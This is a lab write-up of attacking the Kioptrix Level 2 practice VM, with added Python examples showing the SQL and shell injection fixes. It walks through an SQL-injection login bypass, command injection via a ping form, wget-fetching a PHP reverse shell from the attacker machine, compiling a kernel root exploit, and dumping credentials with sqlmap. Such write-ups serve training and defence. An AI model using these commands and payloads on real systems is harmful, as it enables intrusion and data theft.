Core dump overflow


Pentest lab - Kioptrix Level 2


Today I will walk through exploiting level 2 in the Kioptrix series.

Again, I first did a ping sweep with Nmap and determined the IP of the target is 192.168.127.162

Next, the port scan:

nmap -A -p1-65535 192.168.127.162

Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-16 22:52 EEST
Nmap scan report for 192.168.127.162
Host is up (0.00036s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            630/udp  status
|_  100024  1            633/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-07T23:10:47+00:00
|_Not valid after:  2010-10-07T23:10:47+00:00
|_ssl-date: 2014-06-16T16:42:47+00:00; -3h09m46s from local time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: 403 Forbidden
633/tcp  open  status   1 (RPC #100024)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            630/udp  status
|_  100024  1            633/tcp  status
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:20:9D:3E (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30

From web to shell

Pointing the browser to the target, we can see this remote admin login panel:

[screenshot: remote admin login panel]

Immediately thinking SQL injection, I did a quick scan with OWASP ZAP and indeed, the login can be bypassed with an injection such as the following in the login form (the trailing -- comments out the remainder of the query; MySQL only treats it as a comment when a space follows it):

' or '1' = '1' -- 
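To show why that payload works and what the fix looks like, here is an added example (not code from the original post or from the Kioptrix VM). It uses an in-memory SQLite table as a stand-in for the target's MySQL "webapp" database and compares a concatenated login query with a parameterised one; the table rows and the column names are constructed for the example.

```python
import sqlite3

# Constructed stand-in for the box's "webapp" database (SQLite instead of the
# target's MySQL); the two rows mirror what sqlmap dumps later on this page.
_DB = sqlite3.connect(":memory:")
_DB.executescript("""
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', '5afac8d85f');
INSERT INTO users VALUES (2, 'john',  '66lajGGbla');
""")

# The payload from the write-up. The trailing "-- " comments out the rest of the
# statement; MySQL requires the space after "--", SQLite accepts it either way.
PAYLOAD = "' or '1'='1' -- "


def build_vulnerable_query(uname: str, psw: str) -> str:
    """String concatenation, the pattern behind the bypass: user input becomes
    part of the SQL grammar instead of being treated as data."""
    return ("SELECT id FROM users WHERE username='" + uname
            + "' AND password='" + psw + "'")


def vulnerable_login(uname: str, psw: str) -> bool:
    """True when the concatenated query matches any row at all."""
    return _DB.execute(build_vulnerable_query(uname, psw)).fetchone() is not None


def safe_login(uname: str, psw: str) -> bool:
    """Same check with bound parameters: the driver ships the values separately
    from the statement text, so quotes and comment markers stay literal."""
    row = _DB.execute(
        "SELECT id FROM users WHERE username=? AND password=?", (uname, psw)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    print(build_vulnerable_query(PAYLOAD, "anything"))
    print("vulnerable:", vulnerable_login(PAYLOAD, "anything"))  # True
    print("safe:      ", safe_login(PAYLOAD, "anything"))        # False
```

The printed query makes the mechanism visible: the password clause ends up behind the comment marker, and '1'='1' is true for every row, so the first user (admin) is returned. With placeholders the same input is just a username nobody has.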

Now we can see an interface where we can ping hosts, which might mean remote code execution:

[screenshot: ping interface]

After testing the ping functionality, I ran a quick uname -a to confirm that remote code execution is possible:

; uname -a

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux

The semicolon terminates the ping command so that whatever follows runs as a second command: the page pastes the user-supplied host straight into a shell command line without validating it. I poked around a bit, checking whether I could read /etc/shadow (I can't, only /etc/passwd). The commands run as the apache user. So I'm thinking it's time for some PHP backdoor fun! Kali ships a few in /usr/share/webshells/php.
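The following is an added example (not code from the original post or the Kioptrix VM) of the pattern just described and its fix. To keep it runnable offline, echo stands in for the ping command; the injected input mirrors the "; uname -a" trick above but runs echo instead, and all inputs are constructed.

```python
import ipaddress
import subprocess


# "echo" stands in for "ping -c 3" so the example runs offline without raw
# sockets; the injection mechanics are identical (constructed example).
def vulnerable_ping(host: str) -> str:
    """The pattern behind the Kioptrix ping page: the host is pasted into a
    command line that a shell then re-parses, so ';' ends the first command."""
    cmd = "echo pinging " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def argv_ping(host: str) -> str:
    """No shell involved: the host is one argv element, so ';' is just a byte
    inside an argument and nothing after it is executed."""
    argv = ["echo", "pinging", host]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def hardened_ping(host: str) -> str:
    """Defence in depth: reject anything that is not an IP literal, then still
    use an argv list rather than a shell string."""
    addr = ipaddress.ip_address(host.strip())  # ValueError on '127.0.0.1; id'
    return argv_ping(str(addr))


def host_accepted(host: str) -> bool:
    """Triage helper: True if the hardened path would run for this input."""
    try:
        hardened_ping(host)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    evil = "127.0.0.1; echo INJECTED"
    print(vulnerable_ping(evil), end="")  # two lines: the ping and INJECTED
    print(argv_ping(evil), end="")        # one line, ';' printed literally
    print(host_accepted(evil))            # False
```

The middle function is the important one for a code review: removing the shell alone already kills the injection, because the input never reaches a parser that understands ";". The allow-list check on top of it stops the host from smuggling option-style values ("-f", for instance) into the real ping binary.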

First, I’m going to copy the reverse PHP shell to my home directory and rename it:

cp php-reverse-shell.php ~/shell.php

Let’s see the description:

This script will make an outbound TCP connection to a hardcoded IP and port. The recipient will be given a shell running as the current user (apache normally).

Next I looked at the PHP code; the IP and port need to be changed. The IP is the address of the attacker machine, and for the port I just used 80, since outbound connections to port 80 are almost always allowed even where egress filtering is in place.

With that done, the next step is to serve the shell on my machine and use the web interface to download it to the target host.

On my machine:

nc -v -l -p 80 < shell.php

On the web interface:

; wget 192.168.127.159:80 -O /tmp/puppies.php

; ls /tmp

puppies.php

Now listen on my machine for the incoming connection:

nc -v -l -p 80

And on the web interface, execute the shell:

; php /tmp/puppies.php

And we have a shell!

nc: connect to 192.168.127.159 80 from 192.168.127.162 (192.168.127.162) 32772 [32772]
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
 13:15:37 up  2:21,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell

It's time for privilege escalation! The kernel is 2.6.9, inside the range Nmap guessed and well within the versions hit by the sock_sendpage() NULL pointer dereference (CVE-2009-2692), so I will use the sendpage exploit from exploit-db, served the same way as the PHP shell but on a different port:

cp /usr/share/exploitdb/platforms/linux/local/9545.c ~/sendpage.c
nc -vv -l -p 5555 < sendpage.c

And from the shell:

sh-3.00$ wget 192.168.127.159:5555 -O /tmp/sendpage.c
sh-3.00$ cd /tmp
sh-3.00$ gcc -o sendpage sendpage.c
sh-3.00$ chmod a+x sendpage
sh-3.00$ ./sendpage
sh: no job control in this shell
sh-3.00# whoami
root
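Before copying a kernel exploit onto a box it is worth a quick triage of the version string from uname. The following is an added example (not from the original post) that checks uname output against the upstream version ranges listed for CVE-2009-2692; the ranges are from the CVE description and the banner used in the demo is the one shown above.

```python
import re

# Upstream kernel ranges listed for CVE-2009-2692 (sock_sendpage() NULL pointer
# dereference): 2.4.4 through 2.4.37.4 and 2.6.0 through 2.6.30.4.
AFFECTED_RANGES = (
    ((2, 4, 4), (2, 4, 37, 4)),
    ((2, 6, 0), (2, 6, 30, 4)),
)


def parse_kernel_version(uname_output: str) -> tuple:
    """Pull the upstream version out of 'uname -r' or 'uname -a' output.
    '2.6.9-55.EL' -> (2, 6, 9); the distro suffix after '-' is ignored."""
    m = re.search(r"(?<![\w.])(\d+)\.(\d+)\.(\d+)(?:\.(\d+))?", uname_output)
    if not m:
        raise ValueError("no kernel version found in: " + uname_output)
    return tuple(int(p) for p in m.groups() if p is not None)


def _pad(v: tuple, n: int = 4) -> tuple:
    """Right-pad with zeros so (2, 6, 9) compares like (2, 6, 9, 0)."""
    return tuple(v) + (0,) * (n - len(v))


def sendpage_version_affected(uname_output: str) -> bool:
    """True when the upstream version falls inside an affected range. This is
    a triage hint only: vendors backport fixes without bumping the version,
    and the exploit also has to map page zero (blocked by vm.mmap_min_addr on
    kernels that have it), so the proof is running the exploit, as above."""
    v = _pad(parse_kernel_version(uname_output))
    return any(_pad(lo) <= v <= _pad(hi) for lo, hi in AFFECTED_RANGES)


if __name__ == "__main__":
    banner = ("Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 "
              "i686 athlon i386 GNU/Linux")
    print(parse_kernel_version(banner), sendpage_version_affected(banner))  # (2, 6, 9) True
```

On a target with a newer kernel the companion check is sysctl vm.mmap_min_addr: a non-zero value stops unprivileged code from mapping the zero page that this class of NULL-dereference exploit jumps to, unless the exploit brings its own bypass. The 2.6.9 kernel on this box predates that knob entirely.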

Breaking into the database

I will now explore a different attack vector, by using sqlmap to dump the juicy stuff of the database.

sqlmap -u "http://192.168.127.162/index.php" --dbms=MySQL --dump --data "uname=test&psw=pass" --level=5 --risk=3
Database: webapp
Table: users
[2 entries]
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
| 1  | admin    | 5afac8d85f |
| 2  | john     | 66lajGGbla |
+----+----------+------------+

I couldn't connect to the MySQL database from my machine, though (the "MySQL (unauthorized)" in the port scan already hinted that the server rejects connections from other hosts), so I didn't find a use for these credentials.

I also tried an exploit against the CUPS daemon, to no avail. So I guess this is it for level 2.

You have an unusual magnetic personality. Don’t walk too close to metal objects which are not fastened down.
